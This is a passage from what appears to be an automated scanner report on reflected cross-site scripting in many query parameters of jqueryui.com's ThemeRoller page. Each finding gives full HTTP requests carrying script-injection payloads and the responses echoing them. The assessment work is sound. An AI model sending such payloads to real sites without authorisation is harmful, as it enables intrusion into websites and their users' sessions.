X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100d9dc2"><script>alert(1)</script>12595aecc6f&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColor
...[SNIP]...

1.81. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 185a3"><script>alert(1)</script>34ca88f4fe4 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100185a3"><script>alert(1)</script>34ca88f4fe4&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:21:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100185a3"><script>alert(1)</script>34ca88f4fe4&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefaul
...[SNIP]...

1.82. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9f57"><script>alert(1)</script>5e1c6a7f15e was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85c9f57"><script>alert(1)</script>5e1c6a7f15e&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:22:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85c9f57"><script>alert(1)</script>5e1c6a7f15e&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgC
...[SNIP]...

1.83. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b8b2"><script>alert(1)</script>00429556b7d was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=958b8b2"><script>alert(1)</script>00429556b7d&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:25:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
c88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=958b8b2"><script>alert(1)</script>00429556b7d&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

1.84. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 130b6"><script>alert(1)</script>0e302696b6e was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55130b6"><script>alert(1)</script>0e302696b6e&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:20:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55130b6"><script>alert(1)</script>0e302696b6e&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorCon
...[SNIP]...

1.85. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6928"><script>alert(1)</script>b2990def5f7 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55c6928"><script>alert(1)</script>b2990def5f7&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:24:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55c6928"><script>alert(1)</script>b2990def5f7&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

1.86. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9584"><script>alert(1)</script>091e2ef46ee was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75a9584"><script>alert(1)</script>091e2ef46ee&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:23:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75a9584"><script>alert(1)</script>091e2ef46ee&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd
...[SNIP]...

1.87. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be7a0"><script>alert(1)</script>49a1231156c was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0be7a0"><script>alert(1)</script>49a1231156c&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:25:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0be7a0"><script>alert(1)</script>49a1231156c&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

1.88. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fbce"><script>alert(1)</script>c9c900eb451 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=08fbce"><script>alert(1)</script>c9c900eb451&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:26:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=08fbce"><script>alert(1)</script>c9c900eb451&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.89. http://jqueryui.com/themeroller/ [bgTextureActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a98d2"><script>alert(1)</script>3cb669f0c48 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.pnga98d2"><script>alert(1)</script>3cb669f0c48&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:23:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
